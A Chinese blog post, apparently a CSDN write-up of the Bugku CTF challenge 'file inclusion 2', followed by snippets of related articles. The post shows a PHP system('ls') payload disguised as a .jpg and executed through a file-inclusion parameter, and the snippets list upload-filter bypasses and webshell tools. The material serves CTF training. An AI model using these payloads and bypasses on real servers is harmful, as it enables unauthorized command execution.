bugku-Web 文件包含2

最新推荐文章于 2022-03-31 22:19:14 发布
最新推荐文章于 2022-03-31 22:19:14 发布
阅读量489 收藏 1
点赞数
分类专栏: Bugku 文章标签: bugku web 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/85016839
版权

打开网页查看源代码,在最上面发现upload.php,于是我们就访问这个文件:http://123.206.31.85:49166/index.php?file=upload.php

发现是让我们上传文件,然而,我们上传了并没什么用,但是下面说出了文件的位置。

这里我们构造一个文件再上传

创建一个文本文件并输入:<script language=php>system("ls")</script>,然后将文件后缀改为jpg,保存上传。

(system是调用系统命令,ls是查看当前文件夹的文件)

上传后我们访问文件所在位置:http://123.206.31.85:49166/index.php?file=upload/201812151107258968.jpg

看到一个txt文件,里面应该有flag,于是访问一下http://123.206.31.85:49166/index.php?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt

就拿到flag了。

 

注:也可用一句话+菜刀,不过可能上不去

大千SS
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
upload-文件上传漏洞笔记
2202_75361164的博客
05-28 195
单循环绕过:shell.php. .;如果服务器给.php后缀添加了处理器:AddHandler application/x-httpd-php.php 那么,在有多个后缀的情况下,只要包含.php后缀的文件就会被识别出php文件进行解析,不需要是最后一个后缀,可绕过白名单过滤,如:shell.php.jpg。若有则进行绕过,检查php绕过(短标签绕过):<?若没有绕过就可以进行.htaccess绕过和.user.ini绕过,
2020-11-08
YIHAHUHA的博客
11-08 314
BUU UPLOAD COURSE 从页面源代码可以知道有一个文件包含的漏洞 <form action="index.php?file=upload.php" method="post" enctype="multipart/form-data"> 先上传一个图片马,然后包含图片马试试。 显然图片马被重命名的扩展名也变了。但是不妨碍打开它。 成功 [极客大挑战 2019]Upload 测试时发现可以上传 .phtml文件 和文件内容不能含有 <? 访问 info.phtml。 http
文件上传漏洞-(下)
wobushini的博客
03-21 353
Pass-10:双后缀名绕过 效果如下: 尝试双写后缀名绕过: Pass-11:%00截断 使用了白名单方式: 先上传php文件试试看看: url里多了一个“save_path”变量,我们使用%00来绕过: 咦,并没有上传成功呢?原来php.ini文件中有个配置项: magic_quotes_gpc=On 它的作用是将单引号、双引号、反斜杠与NULL等进行转义。 我们先将On改为Off,重启服务...
使用PHP实现文件上传和多文件上传
dianlei9877的博客
06-05 398
PHP2013 年 9 月 4 日 暂无评论 在PHP程序开发中,文件上传是一个使用非常普遍的功能,也是PHP程序员的必备技能之一。值得高兴的是,在PHP中实现文件上传功能要比在Java、C#等语言中简单得多。下面我们结合具体的代码实例来详细介绍如何通过PHP实现文件上传和多文件上传功能。 要使用PHP实现文件上传功能,我们先来编写两个php文件:index.php和up...
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
Bugku-AWD专版用于AWD比赛中的自动化攻击框架源码+项目说明.zip
最新发布
01-14
1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的竞赛项目学习资料,作为参考学习借鉴。 3、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且...
[Bugku-AWD专版]一款用于AWD比赛中的自动化攻击框架.zip
09-30
比赛项目代码
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
[bugku]-文件包含2
weixin_52116519的博客
03-31 1004
考点:通过文件包含的方式读取其他目录下的文件按 1、查看源码,发现hint 2、文件上传点 3、上传1.png文件,抓包,修改内容为一句话木马 4、访问上传文件名,发现有过滤 5、绕过过滤,上传一句话木马 6、访问上传文件名,输出a,说明上传成功。接着getshell即可。 ...
Bugku web——文件包含2
qq_40481505的博客
10-16 905
打开链接,看到链接形式为file=hello.php,因此首先尝试php文件包含 php://filter/read=convert.base64-encode/resource/hello.php 报错 php://input 报错 file://var/www/hello.php 没有报错,但也没有输出 data: text/plain,<?php echo 123; ?> ...
bugku-文件包含2:文件包含与一句话木马配合使用
weixin_51646864的博客
09-07 543
题目:bugku文件包含2 题目采取了后端过滤,而且还将php语言的格式开头过滤了 绕过php的语言格式头试一下 1、查看源码,找到文件上传点 2、创建图片马上传, 利用file变量包含文件,是使jpg文件以php执行 最后用蚁剑连接上图url地址即可
Bugku Web CTF-文件包含2
No Title
12-31 417
Bugku Web CTF-文件包含2 打开是一个页面,题目提示是文件包含,url的格式也很典型: http://123.206.31.85:49166/index.php?file=hello.php 尝试最简单的思路http://123.206.31.85:49166/index.php?file=../../../../../../../../../etc/pass,然后页面显示大字NA...
bugku-文件包含2 writeup
Peithon的博客
04-30 4086
文件包含2 flag格式:SKCTF{xxxxxxxxxxxxxxxx} hint:文件包含 1.访问http://118.89.219.210:49166/查看源代码 2.将hello.php改成upload.php,访问 这里对上传的文件的格式和大小做了限制 3.上传一个图片马,burpsuite抓包改后缀为.php上传失败 4.这对文件的后缀也做了限制,%00截断不...
CTF 中PHP为协议总结
秋叶依剑
11-09 1388
CTF 中PHP为协议总结 php://filter php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。 php://filter 目标使用以下的参数作为它路径的一部分。 复合过...
PHP上传图片类Upload.php
wuzengman的博客
12-27 1162
php异步上传图片,ajax前端上传php后端处理
BugKuCTF套路满满的题--------文件包含2
qq_42133828的博客
12-24 1624
首先讲一下这道题的思路,文件包含,什么是文件包含?其实简单来说就是通过一个文件传入参数(构造语句)去访问另一个文件,从而得到你所想要的东西。 然而,这道题,除了文件包含的知识。还涉及到了文件上传的知识。毕竟,这两者总是相互存在在。。。。。 好了,接下来,开始解题: 首先进入的界面是一个欢迎界面,看URL里的参数得有一个参数file,查看源码可得有upload.php这个文件存在,那么改一下f...
php://filter 的使用
热门推荐
hhh
09-03 2万+
今天做bugku的基础题遇见的……很神奇,真心涨姿势(好吧其实我现在每做一道题都是涨知识) 题目:flag在index里 链接:呼哈哈 题解: 可以看到题目打开的界面里 注意这里:?file=show.php;可以联想到文件包含漏洞,然后我们就可以用php://filter协议来查看源文件内容; 构造:php://filter/read=convert.base64-encode/...
bugku文件包含2
09-25
bugku中,文件包含的方法主要有两种。 首先,可以通过上传文件并抓包的方式来实现文件包含。通过修改参数content-type为image/jpeg filename="1.php:.jpg",可以获取到文件路径。 然后,访问返回的路径,可以看到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值